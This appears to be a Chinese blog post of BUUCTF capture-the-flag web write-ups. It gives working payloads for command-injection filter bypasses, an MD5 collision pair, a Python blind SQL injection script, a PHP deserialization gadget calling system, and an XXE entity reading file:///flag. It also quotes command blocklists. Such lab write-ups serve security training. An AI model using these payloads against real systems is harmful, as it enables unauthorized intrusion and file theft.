题记录6"/>
[BUUCTF]刷题记录6
[WUSTCTF2020]朴实无华
- 目录扫描
- intval函数的科学记数法绕过
- MD5加密后与加密前相等
直接去扫目录,扫到了fl4g.php
if (isset($_GET['num'])){$num = $_GET['num'];if(intval($num) < 2020 && intval($num + 1) > 2021){echo "我不经意间看了看我的劳力士, 不是想看时间, 只是想不经意间, 让你知道我过得比你好.</br>";}else{die("金钱解决不了穷人的本质问题");}
}else{die("去非洲吧");
}
//level 2
if (isset($_GET['md5'])){$md5=$_GET['md5'];if ($md5==md5($md5))echo "想到这个CTFer拿到flag后, 感激涕零, 跑去东澜岸, 找一家餐厅, 把厨师轰出去, 自己炒两个拿手小菜, 倒一杯散装白酒, 致富有道, 别学小暴.</br>";elsedie("我赶紧喊来我的酒肉朋友, 他打了个电话, 把他一家安排到了非洲");
}else{die("去非洲吧");
}//get flag
if (isset($_GET['get_flag'])){$get_flag = $_GET['get_flag'];if(!strstr($get_flag," ")){$get_flag = str_ireplace("cat", "wctf2020", $get_flag);echo "想到这里, 我充实而欣慰, 有钱人的快乐往往就是这么的朴实无华, 且枯燥.</br>";system($get_flag);}else{die("快到非洲了");}
}else{die("去非洲吧");
}
?>
第一层,利用科学计数法,2e4,当进行2e4+1的时候就变成了2e41,这样就绕过了这个函数
第二层,$md5==md5($md5)
,意思是md5加密前后相等,之前有做到过,用的是
第三层,第一个if就不要有空格,可以用%09来绕过,然后就是一个str_ireplace()函数
用tac就可以了
/fl4g.php/?num=2e4&md5=0e215962017&get_flag=tac%09fllllllllllllllllllllllllllllllllllllllllaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaag
[安洵杯 2019]easy_web
- 加密的探索
- include函数的猜测
- 强制类型转换的md5三等号绕过
有个隐藏的字体
目录扫描什么都没扫到
看url里面有个cmd
感觉绝大多数的命令都被过滤了,看前面的编码,试着拿去解密来探索一下他的加密过程,竟然真搞出来了,两次base64,再一次hex转字符串
拿CyberChef加密,包含一下index.php
源码拿到手
<?php
error_reporting(E_ALL || ~ E_NOTICE);
header('content-type:text/html;charset=utf-8');
$cmd = $_GET['cmd'];
if (!isset($_GET['img']) || !isset($_GET['cmd'])) header('Refresh:0;url=./index.php?img=TXpVek5UTTFNbVUzTURabE5qYz0&cmd=');
$file = hex2bin(base64_decode(base64_decode($_GET['img'])));$file = preg_replace("/[^a-zA-Z0-9.]+/", "", $file);
if (preg_match("/flag/i", $file)) {echo '<img src ="./ctf3.jpeg">';die("xixi~ no flag");
} else {$txt = base64_encode(file_get_contents($file));echo "<img src='data:image/gif;base64," . $txt . "'></img>";echo "<br>";
}
echo $cmd;
echo "<br>";
if (preg_match("/ls|bash|tac|nl|more|less|head|wget|tail|vi|cat|od|grep|sed|bzmore|bzless|pcre|paste|diff|file|echo|sh|\'|\"|\`|;|,|\*|\?|\\|\\\\|\n|\t|\r|\xA0|\{|\}|\(|\)|\&[^\d]|@|\||\\$|\[|\]|{|}|\(|\)|-|<|>/i", $cmd)) {echo("forbid ~");echo "<br>";
} else {if ((string)$_POST['a'] !== (string)$_POST['b'] && md5($_POST['a']) === md5($_POST['b'])) {echo `$cmd`;} else {echo ("md5 is funny ~");}
}?>
主要是这个md5绕过,他强制转换了类型后就不能数组绕过了
if ((string)$_POST['a'] !== (string)$_POST['b'] && md5($_POST['a']) === md5($_POST['b']))
在网上找到了一个payload
a=%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%00%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%55%5d%83%60%fb%5f%07%fe%a2b=%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%02%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%d5%5d%83%60%fb%5f%07%fe%a2
ls被过滤可以用
- dir
cat过滤有好几办法绕过
- ca\t
- sort
- uniq
[BJDCTF 2nd]简单注入
- 布尔盲注
- 二分法脚本编写
hint.txt给出了sql语句
select * from users where username='$_POST["username"]' and password='$_POST["password"]';
估计是要爆破出账号密码
引号被过滤,尝试用\来转义引号
username=1\
password=or 1>0#
回显不一样了
脚本搞起来
用二分法来布尔盲注
import requestsurl=".php"msg = ""for x in range(1,50):max = 127min = 0for y in range(127):s = int((max+min)/2)data={'username' : '1\\','password' : 'or (ascii(substr(password,{},1)))>{}#'.format(x,s)}res = requests.post(url=url,data=data).textif 'stronger' in res:min=selse:max=sif ((max-min) <= 1):msg += chr(max) print(msg)break
username=admin
password=OhyOuFOuNdit
[网鼎杯 2020 朱雀组]phpweb
- php函数积累
- 反序列化
- find命令的使用
点开发现他会跳转,试着把date换一个函数,echo试试,里面就返回了call_user_func()
函数
用system函数会被检测
扫目录也没结果
想着弄出index.php的内容来,可以使用file_get_content函数,也可以使用highlight_file函数
- file_get_content
- highlight_file
拿到源码
<?php$disable_fun = array("exec","shell_exec","system","passthru","proc_open","show_source","phpinfo","popen","dl","eval","proc_terminate","touch","escapeshellcmd","escapeshellarg","assert","substr_replace","call_user_func_array","call_user_func","array_filter", "array_walk", "array_map","registregister_shutdown_function","register_tick_function","filter_var", "filter_var_array", "uasort", "uksort", "array_reduce","array_walk", "array_walk_recursive","pcntl_exec","fopen","fwrite","file_put_contents");function gettime($func, $p) {$result = call_user_func($func, $p);$a= gettype($result);if ($a == "string") {return $result;} else {return "";}}class Test {var $p = "Y-m-d h:i:s a";var $func = "date";function __destruct() {if ($this->func != "") {echo gettime($this->func, $this->p);}}}$func = $_REQUEST["func"];$p = $_REQUEST["p"];if ($func != null) {$func = strtolower($func);if (!in_array($func,$disable_fun)) {echo gettime($func, $p);}else {die("Hacker...");}}?>
system函数被过滤了,不能放到func参数里面,所以利用起这个类来,我们反序列化一下
<?phpclass Test {var $p = "ls /";var $func = "system";function __destruct() {if ($this->func != "") {echo gettime($this->func, $this->p);}}}$data = new Test;
echo serialize($data);
flag竟然不在
用find查找
find / -name flag*
果然
[NCTF2019]Fake XML cookbook
- xxe
第一次写xxe的题目
附一个介绍吧.html
抓包看到里面的信息
payload:
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE note [<!ENTITY admin SYSTEM "file:///flag">]>
<user><username>&admin;</username><password>123456</password></user>
[ASIS 2019]Unicorn shop
-Unicode编码漏洞
应该是要买到最后一个独角兽就可以拿到flag
但是我们输入1337的时候,报错说只能有一个字符
可以去找一个字符,对应的数字大于1337就行
/
搜thousand随便找一个大于1337的就可以了
payload:
id=4&price=%E2%86%82
更多推荐
[BUUCTF]刷题记录6
发布评论